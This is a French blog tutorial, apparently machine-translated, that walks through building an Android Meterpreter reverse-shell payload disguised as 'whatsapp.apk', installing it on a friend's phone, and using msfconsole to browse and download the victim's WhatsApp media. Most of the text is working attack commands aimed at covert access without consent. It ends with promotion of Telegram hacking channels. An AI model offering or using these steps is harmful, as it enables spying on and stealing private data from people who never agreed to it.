Comment pirater WhatsApp à l'aide de Meterpreter dans Kali Linux
FaxelAujourd'hui, je vais vous dire comment vous pouvez pirater WhatsApp de l'un de vos amis et voir toutes les données de son WhatsApp.
Nous allons faire tout ce processus sur notre système Linux, pour lequel nous devons d'abord copier quelques commandes et
créez une charge utile que vous placerez dans le mobile de votre ami et vous pourrez ensuite pirater toutes les données de votre mobile de votre ami.
Kali Linux / Termux- Créer une charge utile
msfvenom -p android/meterpreter/reverse_tcp lhost=(Votre IP) lport=(VOTRE NUMÉRO DE PORT) R > whatsapp.apk
Pour créer une charge utile, vous devez d'abord taper quelques commandes que vous trouverez dans la section de la commande et vous avez également montré sur la photo ici dans l'hôte L vous devez entrer l'adresse IP de votre machine et dans le port L, vous pouvez entrer n'importe quel numéro de port peut donner.
Après avoir inséré les commandes, votre charge utile sera créée et vous verrez une telle interface à l'intérieur dont on vous a dit quelle est la taille de votre charge utile.
Nous devons maintenant mettre la charge utile dans le téléphone de notre ami et l'installer. Après avoir installé la charge utile, vous devez l'ouvrir.
Kali Linux / Termux- Ouvrez l'outil.
msfconsole
Après cela, pour contrôler la charge utile de votre machine, vous devez ouvrir un outil nommé (msfconsole) à partir de dont vous pouvez contrôler votre charge utile. Au fur et à mesure que vous saisissez le nom du clan dans votre terminal, votre outil démarre à ouvrir comme vous pouvez le voir sur ma photo.
Kali Linux / Termux- Remplissez les informations de la charge utile.
use exploit/multi/handler set payload android/meterpreter/reverse_tcp
Vous pouvez voir que mon outil s'est ouvert, maintenant je dois connecter ma charge utile à son péage, pour lequel la commande de commande se trouvera dans la section commentaire.
set lhost (Votre IP) exploit
Ici, vous devez entrer l'adresse IP de votre machine dans l'hôte L, puis écrire la commande d'exploit et appuyez sur le bouton Entrée et vous pouvez voir que mon outil a démarré et est prêt à se connecter à la charge utile.
Vous pouvez maintenant voir que mon outil est connecté à la charge utile. Si vous ne vous connectez pas à la charge utile, vous devez à nouveau ouvrir la charge utile. Et puis un type d'interface s'ouvrira devant vous.
Kali Linux / Termux- Accédez au dossier racine mobile.
cd / ls -l
Ici, vous êtes connecté au téléphone, maintenant vous devez prendre les données de son WhatsApp de son telephone, pour lequel il faut d'abord aller dans les fichiers racine de son téléphone, dont la commande est donnée dans le section des commentaires.
Kali Linux / Termux- Accédez à la carte memoire.
cd sdcard ls -l
Après être venu ici, vous devez vous rendre sur sa carte SD où sont enregistrées les données de chaque application, dont les commandes se retrouveront également dans la section des commentaires.
Après être arrivé sur la carte SD, vous verrez l'interface de certaines de ces applications où toutes les applications installées dans son téléphone seront visibles par tous.
Kali Linux / Termux- Accédez au dossier WhatsApp.
cd WhatsApp ls -l
À propos, vous devez aller dans le dossier avec WhatsApp et prendre les données à partir de là, dont la commande se trouve dans la section des commentaires.
cd Media ls -l
Après être entré dans WhatsApp, vous aurez certains de ces fichiers ouverts devant vous, là où vous devez allez dans le dossier multimédia.
Après être arrivé dans le dossier multimédia, les données WhatsApp de votre ami s'ouvriront devant vous, vous pouvez maintenant télécharger n'importe quoi à partir d'ici.
cd WhatsApp \ Images ls -l
Comme je vais aller dans le dossier image et télécharger une image et vous montrer les commandes que vous trouverez au dessus.
download (VOTRE NOM DE FICHIER)
Une fois l'image dans le dossier, vous devez écrire le nom du fichier que vous souhaitez télécharger après le téléchargez et appuyez sur le bouton Entrée et vous pouvez voir que mon fichier a été téléchargé. Ensuite, vous pouvez voir ce que vous voulez. En utilisant cette méthode, vous pouvez télécharger des médias, des documents, etc. Pour voir les chats, vous devez télécharger les bases de données de votre victime, je vais faire un autre tutoriel pour cela. J'espère que vous apprenez quelque chose dans ce tutoriel
Si vous voulez un tutoriel de piratage quotidien et que vous voulez apprendre le piratage éthique, rejoignez notre chaîne de télégramme et nous partageons également des cours udemy gratuits, alors n'oubliez pas de vous inscrire.
➖➖➖https://t.me/Hacker_Termux1 && https://t.me/Krypton17➖➖➖
Commentaires
Enregistrer un commentaire